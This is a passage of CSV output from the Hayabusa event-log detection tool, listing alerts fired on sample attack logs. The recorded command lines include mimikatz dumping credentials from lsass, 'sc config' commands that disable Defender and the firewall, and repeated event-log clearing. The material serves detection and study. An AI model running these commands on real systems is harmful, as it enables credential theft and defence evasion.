File,,rules/sigma/process_creation/proc_creation_win_run_from_zip.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmdkey.exe"" /delete Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip | Process: C:\Windows\System32\cmdkey.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: cscript.exe //e:jscript testme.js | LID: 0x779c2 | PID: 19000 | PGUID: 00247C92-94E0-6171-0000-0010B84D987B",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,medium,Exec | Evas,Suspicious ZipExec Execution,,rules/sigma/process_creation/proc_creation_win_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:14.015 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" popup ""Malicious Behavior Detection Alert"" ""Elastic Security detected Execution via Renamed Signed Binary Proxy"" ""C:\Program Files\Elastic\Endpoint\cache\resources\elastic-endpoint-security.png"" | Process: C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" run | LID: 0x779c2 | PID: 26868 | PGUID: 00247C92-94E0-6171-0000-00104337987B",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 02:38:36.711 +09:00,FS03.offsec.lan,4104,medium,Exec,Windows PowerShell Web 
Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-22 02:38:36.742 +09:00,FS03.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-22 02:53:42.530 +09:00,FS03.offsec.lan,59,info,Evas | Persis,Bits Job Created,Job Title: BITS Transfer | URL: https://releases.ubuntu.com/20.04.3/ubuntu-20.04.3-desktop-amd64.iso,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID60-High volume file downloaded with BITS.evtx +2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: mimikatz.exe | Process: C:\TOOLS\Mimikatzx64\mimikatz.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1f4c65f | PID: 2032 | PGUID: 7CF65FC7-D02C-6171-1203-000000001200 | Hash: SHA1=D241DF7B9D2EC0B8194751CD5CE153E27CC40FA4,MD5=A3CB3B02A683275F7E0A0F8A9A5C9E07,SHA256=31EB1DE7E840A342FD468E558E5AB627BCB4C542A8FE01AEC4D5BA01D539A0FC,IMPHASH=DBDEA7B557F0E6B5D9E18ABE9CE5220A",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx +2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx +2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,,Process 
Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: mimikatz.exe | LID: 0x2e6dea4 | PID: 5040 | PGUID: 7CF65FC7-D04B-6171-1303-000000001200 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx +2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx +2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,low,,Process Access,Src Process: C:\TOOLS\Mimikatzx64\mimikatz.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 2032 | Src PGUID: 7CF65FC7-D02C-6171-1203-000000001200 | Tgt PID: 512 | Tgt PGUID: 7CF65FC7-6649-6165-0B00-000000001200,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx +2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx +2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,ResDev,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx +2021-10-22 22:39:49.619 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx +2021-10-22 22:39:50.927 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh advfirewall show allprofiles | Path: C:\Windows\System32\netsh.exe | PID: 0x1328 | User: admmig | LID: 0x1f4c65f,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx +2021-10-22 22:39:55.502 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh a show allprofiles | Path: C:\Windows\System32\netsh.exe | PID: 0x10c4 | User: admmig | LID: 0x1f4c65f,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx +2021-10-22 23:02:11.218 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx +2021-10-22 23:02:11.902 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,Cmd Line: schtasks /query /xml | Path: C:\Windows\System32\schtasks.exe | PID: 0xce0 | User: admmig | LID: 0x1f4c65f,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx +2021-10-22 23:02:15.177 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x3198a75,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx +2021-10-24 06:50:11.666 +09:00,FS03.offsec.lan,4625,low,,Logon Failure - Unknown Reason,User: - | Type: 10 | Computer: - | IP Addr: 10.23.23.9 | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-failed login with denied access due to account restriction.evtx +2021-10-24 06:51:57.212 +09:00,FS03.offsec.lan,4625,low,,Logon Failure - Unknown Reason,User: - | Type: 10 | Computer: - | IP Addr: 10.23.23.9 | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-failed login with denied access due to account restriction.evtx +2021-10-25 16:23:05.614 +09:00,FS03.offsec.lan,4104,medium,Exfil,Powershell Exfiltration Over SMTP,,rules/sigma/powershell/powershell_script/posh_ps_send_mailmessage.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated 
(PowerShell).evtx +2021-10-25 16:23:05.614 +09:00,FS03.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:57:04.361 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc config sense start= disabled | Path: C:\Windows\System32\sc.exe | PID: 0xe58 | User: admmig | LID: 0x1844fa6,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender service deactivation attempt.evtx +2021-10-25 16:57:05.977 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc config mpssvc start= disabled | Path: C:\Windows\System32\sc.exe | PID: 0x2ebc | User: admmig | LID: 0x1844fa6,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender service deactivation attempt.evtx +2021-10-25 16:57:08.463 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc config WinDefend start= disabled | Path: C:\Windows\System32\sc.exe | PID: 0x2e40 | User: admmig | LID: 0x1844fa6,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender service deactivation attempt.evtx +2021-10-26 03:04:30.334 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:09:51.875 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.002 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.080 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.095 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.127 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.142 
+09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.215 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.293 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.340 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.355 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.418 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.480 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.527 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.574 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.591 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.606 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.638 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.653 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.669 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.747 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.778 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.794 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.841 
+09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.856 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.888 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.903 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.950 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.997 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.028 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.044 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.059 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.075 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.106 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.138 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.184 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.200 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.216 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.231 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.263 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.294 
+09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.309 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.325 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.341 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.356 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 